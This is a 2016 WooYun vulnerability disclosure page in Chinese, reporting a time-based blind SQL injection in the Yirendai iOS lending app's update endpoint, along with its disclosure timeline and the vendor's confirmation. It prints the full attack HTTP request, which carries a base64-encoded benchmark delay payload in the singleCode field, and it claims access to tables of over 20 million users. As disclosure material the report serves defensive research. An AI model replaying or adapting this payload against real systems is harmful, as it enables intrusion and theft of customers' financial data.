乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-20: 细节已通知厂商并且等待厂商处理中 2016-03-20: 厂商已经确认,细节仅向厂商公开 2016-03-30: 细节向核心白帽子及相关领域专家公开 2016-04-09: 细节向普通白帽子公开 2016-04-19: 细节向实习白帽子公开 2016-05-04: 细节向公众公开
APP安全之SQL注入
目标:宜人贷IOS APP检测发现以下地方存在SQL注入:(POST中的singleCode,BASE64编码,时间盲注)
POST http://app.normal.yirendai.com/user/appUpdate HTTP/1.1Host: app.normal.yirendai.comProxy-Connection: closeContent-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: 宜人贷借款 3.4.0 rv:549 (iPhone; iPhone OS 9.2.1; zh_CN)Content-Length: 315Accept-Encoding: gzipConnection: closesystem=eyJhcHBWZXJzaW9uTmFtZSI6IjMuNC4wIiwic2luZ2xlQ29kZSI6IjU2NDQ0M0NDLTkxODktNDJDMS05Q0M5LTA5MjIxMTZBRDVDNCIsImxhdCI6IiIsImFwcFZlcnNpb25Db2RlIjoiNTQ5IiwiaXNFbXVsYXRvciI6IjAiLCJzeXN0ZW1QaG9uZSI6ImlvcyIsInN5c3RlbVZlcnNpb24iOiI5LjIwMDAwMCIsInRkQ2hhbm5lbElEIjoiYXBwU3RvcmUiLCJzeXN0ZW1Nb2RlbCI6ImlQaG9uZSIsImxuZyI6IiJ9
Payload:(延时)
POST http://app.normal.yirendai.com/user/appUpdate HTTP/1.1Content-Length: 383Accept-Language: en-us,en;q=0.5Accept-Encoding: gzipHost: app.normal.yirendai.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: ˴ 3.4.0 rv:549 (iPhone; iPhone OS 9.2.1; zh_CN)Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7Cookie: JSESSIONID=3C9A6D149C83DB1766AB156C0B0CC845.yrdasnew-01Pragma: no-cacheCache-Control: no-cache,no-storeContent-Type: application/x-www-form-urlencoded; charset=utf-8system=eyJhcHBWZXJzaW9uTmFtZSI6IjMuNC4wIiwic2luZ2xlQ29kZSI6IjU2NDQ0M0NDLTkxODktNDJDMS05Q0M5LTA5MjIxMTZBRDVDNCcgWE9SKGlmKDE9MSxiZW5jaG1hcmsoMTAwMDAwMDAsbWQ1KDExMSkpLDApKWFuZCciLCJsYXQiOiIiLCJhcHBWZXJzaW9uQ29kZSI6IjU0OSIsImlzRW11bGF0b3IiOiIwIiwic3lzdGVtUGhvbmUiOiJpb3MiLCJzeXN0ZW1WZXJzaW9uIjoiOS4yMDAwMDAiLCJ0ZENoYW5uZWxJRCI6ImFwcFN0b3JlIiwic3lzdGVtTW9kZWwiOiJpUGhvbmUiLCJsbmciOiIifQ==
1、当前数据库用户
2、所有数据库
3、用户表,订单表,含2000W+用户数据/40W+交易订单,具体就不深入了
请多指教~
危害等级:高
漏洞Rank:20
确认时间:2016-03-20 16:41
感谢白帽子发现的问题,正在处理
暂无